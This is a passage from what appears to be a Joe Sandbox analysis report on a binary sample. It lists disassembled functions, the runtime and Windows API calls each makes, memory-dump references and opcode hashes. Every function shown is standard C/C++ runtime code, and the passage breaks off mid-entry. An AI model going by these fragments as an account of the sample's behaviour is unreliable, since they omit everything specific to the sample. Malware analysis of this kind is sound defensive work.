                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                            • API String ID: 1206542248-393685449
                                                                                                                                                                                                                            • Opcode ID: a9e2c0cfb747b7c74e302595a31fdba0bbfd418f47a2f5fd5a1fe7d0101daf74
                                                                                                                                                                                                                            • Instruction ID: 6c1376f5f82c7664429b51fa01a936260e3de9fd218dbef1ae43a87c747dee7c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9e2c0cfb747b7c74e302595a31fdba0bbfd418f47a2f5fd5a1fe7d0101daf74
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EB17A72800209EFDF19DFA4D9819AEBBB5BF24310F144169F8556B212D731EA51CBD2
                                                                                                                                                                                                                            Function 0019C8D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0019C907
                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0019C90F
                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0019C998
                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0019C9C3
                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0019CA18
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                            • Opcode ID: 4fdd39745adb7345a6936d400da34406e941e9a737caad057a4d27695deafba5
                                                                                                                                                                                                                            • Instruction ID: 350d9619ba4047d08ebbcbcddd1c67275e8776923b73e5cb780caae0e0238b17
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fdd39745adb7345a6936d400da34406e941e9a737caad057a4d27695deafba5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D241A434A00209AFCF10DF68C885AAEBBB5AF55318F148195F859AB392D731EE51CFD1
                                                                                                                                                                                                                            Function 001A71EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,BB40E64E,?,001A72FC,0019EE66,?,F8250000,00000000), ref: 001A72B0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                                                                                                                            • Opcode ID: 6db3bffc711ff31d10cd8e744e83122d91acb3c1a88f3c379213269c2c92a556
                                                                                                                                                                                                                            • Instruction ID: 30308bfda471d636d0964868880c149e0b7bde2d9bb3bc1202b360bc8f4fdf5c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6db3bffc711ff31d10cd8e744e83122d91acb3c1a88f3c379213269c2c92a556
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4213A3AA45210A7CB32AB61EC54B9A3768AF53360F290216F915E72D0D730EF01C6E0
                                                                                                                                                                                                                            Function 001948F7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00194903
                                                                                                                                                                                                                            • int.LIBCPMT ref: 00194916
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00194949
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0019495F
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0019496A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                            • String ID: PB"
                                                                                                                                                                                                                            • API String ID: 2081738530-2228394945
                                                                                                                                                                                                                            • Opcode ID: 57992d4ff83cdfce424c1a832d8c8dd91261a50bac36fbe8236a9246cbf8c737
                                                                                                                                                                                                                            • Instruction ID: 660eace339ca85a11e2f3aca17ff163a8dcdc46ae34cfc40e49aa5366eac84a7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 57992d4ff83cdfce424c1a832d8c8dd91261a50bac36fbe8236a9246cbf8c737
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73012632D10115BBCF28BB94E825C9F7B68EF95764B240108F91597291DF30AE43DBD0
                                                                                                                                                                                                                            Function 0019CA94 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0019CA8B,0019AD89,001969F4,BB40E64E,?,?,?,?,001B52D0,000000FF), ref: 0019CAA2
                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0019CAB0
                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0019CAC9
                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,0019CA8B,0019AD89,001969F4,BB40E64E,?,?,?,?,001B52D0,000000FF), ref: 0019CB1B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                            • Opcode ID: 351789899969d4f20248e5a2532e1e4a77e30d3b180ebeba39e85da2ac4f75b1
                                                                                                                                                                                                                            • Instruction ID: 358fccb8e432dabd1db1e6376dd2748fdc373ddf668da55287609b9d25111967
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 351789899969d4f20248e5a2532e1e4a77e30d3b180ebeba39e85da2ac4f75b1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E01F7322087116FEF246BB57C86D6A6B45EB217B5330033DF176524F1EF658D4092C0
                                                                                                                                                                                                                            Function 001A3BE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,001B54C3,000000FF,?,001A3B70,001A3CA0,?,001A3B44,00000000), ref: 001A3C15
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,001B54C3,000000FF,?,001A3B70,001A3CA0,?,001A3B44,00000000), ref: 001A3C27
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,001B54C3,000000FF,?,001A3B70,001A3CA0,?,001A3B44,00000000), ref: 001A3C49
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                            • Opcode ID: e6910ae28573f37ad2ee109a23893abed2cf04eb1e52240a00be539cc9efafe9
                                                                                                                                                                                                                            • Instruction ID: 971c0daa0c5d623321860ab8f1a100f4cc7b17033ad3c30155a1a460c24588f5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6910ae28573f37ad2ee109a23893abed2cf04eb1e52240a00be539cc9efafe9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9901DB32944625FFDB159F51DC09FEEBBF8FB04B11F040625F911A26D0DB789940CA40
                                                                                                                                                                                                                            Function 001AC9D4 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 001ACA5B
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 001ACB1C
                                                                                                                                                                                                                            • __freea.LIBCMT ref: 001ACB83
                                                                                                                                                                                                                              • Part of subcall function 001A7A23: HeapAlloc.KERNEL32(00000000,001ADBAE,?,?,001ADBAE,00000220,?,?,?), ref: 001A7A55
                                                                                                                                                                                                                            • __freea.LIBCMT ref: 001ACB98
                                                                                                                                                                                                                            • __freea.LIBCMT ref: 001ACBA8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1096550386-0
                                                                                                                                                                                                                            • Opcode ID: f4e55c0187827c286ba41230a5c9b11633073d9e27f70300481628ce028c2b37
                                                                                                                                                                                                                            • Instruction ID: 2049c90d2803805c55e85fcce215a1b82170af550cb42916a5e99d39d37e1ab0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4e55c0187827c286ba41230a5c9b11633073d9e27f70300481628ce028c2b37
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE51B4B660021AAFEF259F68CC82EBB7AA9EF56790F150128FD04E7151E775CD1087E0
                                                                                                                                                                                                                            Function 00198BAA Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32(00000034,?,00000002,?,001934CC,?,?), ref: 00198BBE
                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(00000003,?,00000002,?,001934CC,?,?), ref: 00198BDD
                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(00000003,00000000,00000000,?,00000002,?,001934CC,?,?), ref: 00198C0B
                                                                                                                                                                                                                            • TryAcquireSRWLockExclusive.KERNEL32(00000003,00000000,00000000,?,00000002,?,001934CC,?,?), ref: 00198C66
                                                                                                                                                                                                                            • TryAcquireSRWLockExclusive.KERNEL32(00000003,00000000,00000000,?,00000002,?,001934CC,?,?), ref: 00198C7D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 66001078-0
                                                                                                                                                                                                                            • Opcode ID: 485209c73d337b8a640c2a91fa4121b401742e423989856d115350b2d1ec86df
                                                                                                                                                                                                                            • Instruction ID: 535d241768c46b54efd244b359c64847758db79de94e223969ed2ac5d6192b5c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 485209c73d337b8a640c2a91fa4121b401742e423989856d115350b2d1ec86df
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C412671902A06DBCF24DF65C8819AAB3F4FF1A350B504A2AE457D7A40EB34F984CB71
                                                                                                                                                                                                                            Function 00194A2F Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00194A3B
                                                                                                                                                                                                                            • int.LIBCPMT ref: 00194A4E
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00194A81
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00194A97
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00194AA2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                                                                            • Opcode ID: 7768702195c56129276ec871c4142f8591bb6926fe5785aab73394fa0544e166
                                                                                                                                                                                                                            • Instruction ID: 99b5b33fb40c2ddd233a1461e99c74dc868882da7e4df62b65f16f494dac67cd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7768702195c56129276ec871c4142f8591bb6926fe5785aab73394fa0544e166
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84012636910115BBCF24ABA4E805C9E7768EF91360F250108F802A72A0EF70DE428780
                                                                                                                                                                                                                            Function 00194F6E Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00194F7A
                                                                                                                                                                                                                            • int.LIBCPMT ref: 00194F8D
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00194FC0
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00194FD6
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00194FE1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                                                                            • Opcode ID: 255f4cf08b0ef4445cb2dc9c6efbf3015198c7f8bd19c81de7081857add5e75a
                                                                                                                                                                                                                            • Instruction ID: cbfc883058d0d25b3001417605d62af499087d9ff52e465c93edc064462768e9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 255f4cf08b0ef4445cb2dc9c6efbf3015198c7f8bd19c81de7081857add5e75a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85012632910115BBCF24AB98E805C9E7768EF91360B250109F911A7290EF30EE82C780
                                                                                                                                                                                                                            Function 001987C2 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 001987C9
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 001987D4
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00198842
                                                                                                                                                                                                                              • Part of subcall function 00198925: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0019893D
                                                                                                                                                                                                                            • std::locale::_Setgloballocale.LIBCPMT ref: 001987EF
                                                                                                                                                                                                                            • _Yarn.LIBCPMT ref: 00198805
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1088826258-0
                                                                                                                                                                                                                            • Opcode ID: 76e932dd4a9403f47bad38c61605c66790351fe0338337ccc997128d320824d3
                                                                                                                                                                                                                            • Instruction ID: e20684718c6eb2a98c4f6aab032cd5c4ef854166e2c7556479232e3003a279d6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76e932dd4a9403f47bad38c61605c66790351fe0338337ccc997128d320824d3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12017C76A002619BCF06EB64E85597C7BB1FFE6750B180149F80157391CF386E46CB92
                                                                                                                                                                                                                            Function 0019DB97 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0019DB48,?,?,00000000,?,?,?,0019DC72,00000002,FlsGetValue,001B7CF0,FlsGetValue), ref: 0019DBA4
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0019DB48,?,?,00000000,?,?,?,0019DC72,00000002,FlsGetValue,001B7CF0,FlsGetValue,?,?,0019CAB5), ref: 0019DBAE
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 0019DBD6
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                            • Opcode ID: c7784d33fccf299011b0589b17dddfaa6fa6ee260690a63a5e8af79589c02694
                                                                                                                                                                                                                            • Instruction ID: c133234c4cb124ee3bb6ca03609e76eb7768d5bdcd4e9e21aa3547099170dd64
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7784d33fccf299011b0589b17dddfaa6fa6ee260690a63a5e8af79589c02694
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0E04F70284308B7EF202B62ED06F593F55AB11B50F150420F94EE98E1EB65E8949595
                                                                                                                                                                                                                            Function 0019937A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(0022437C,00224EAC,?,0019563F,00224EAC,001B5740,00000000,00191C44), ref: 00199384
